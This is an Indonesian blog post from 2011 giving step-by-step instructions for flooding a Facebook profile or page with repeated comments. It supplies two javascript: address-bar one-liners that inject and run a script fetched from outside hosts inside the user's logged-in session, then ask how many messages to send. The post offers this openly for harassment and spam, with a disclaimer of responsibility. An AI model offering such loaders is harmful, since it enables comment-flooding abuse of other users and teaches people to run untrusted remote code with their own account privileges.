Breaking News
Loading...
Sunday, September 4, 2011

Membuat Bom Komentar di Facebook

9/04/2011
 
Assalamualaikum Wr. Wb. Siang sobat semua, hari ini saya akan berbagi Tips n Trik untuk Membuat Bom Komentar di Facebook. Mungkin sebagian besar dari sobat semua sudah mengetahui cara ini, tapi tidak ada salahnya saya membaginya disini :). Oke, langsung saja dibahas:

1. Pertaman buka Profil atau Halaman Facebook yang ingin anda kirimkan bom komentar.
2. Copy dan paste-kan salah satu code javascript dibawah ini ke ADDRESS BAR lalu tekan tombol ENTER
Code:
javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0)
Javascript code Bom Wall By Anak-anak Duktek Telkomsel CC Mksr
Code:
javascript:(a = (b = document).createElement("script")).src = "http://aly.net84.net/js.js", b.body.appendChild(a); void(0)
3. Lalu akan muncul sebuah jendela, Masukkan Jumlah Pesan Yang Akan Dikirim, tekan ENTER.
4. Kemudian Masukkan Komentar Anda, ENTER.
5. Tunggu sesaat dan jangan tutup profil teman Facebook anda.
6. Selamat nge-bom !!

Berikut Source codenya:

Disini saya juga mengingatkan, apapun yang terjadi bukan tanggung jawab saya :P, Do at Your Own Risk, oke cukup sekian postingan ini, semoga bermanfaat, bila ada tanggapan silakan kasih komentar dibawah :D. Akhir kata Keep Sharing & Smile. Wassalamualaikum Wr. Wb.

Source  dengan perubahan : http://blog.cyber4rt.com/335
Rating: 5, Reviewer : Yufex E,

6 Comments:

  1. - www.gasoof.com
    yeah, thank you :D

    ReplyDelete
  2. Kalo trik code untuk bom koment di yahoo artikel gimana bro???

    ReplyDelete
  3. Kalo trik code untuk bom koment di yahoo artikel gimana bro???

    ReplyDelete
  4. Sepertinya,skrg udah gk bisa deh .

    ReplyDelete

Terimakasih telah berkunjung di LpuARmy Blog, budayakan berkomentar dengan nama (jangan pakai Anonymous) dan baik yah :)

sankyu :)
- Admin LpuARmy Blog

 
Toggle Footer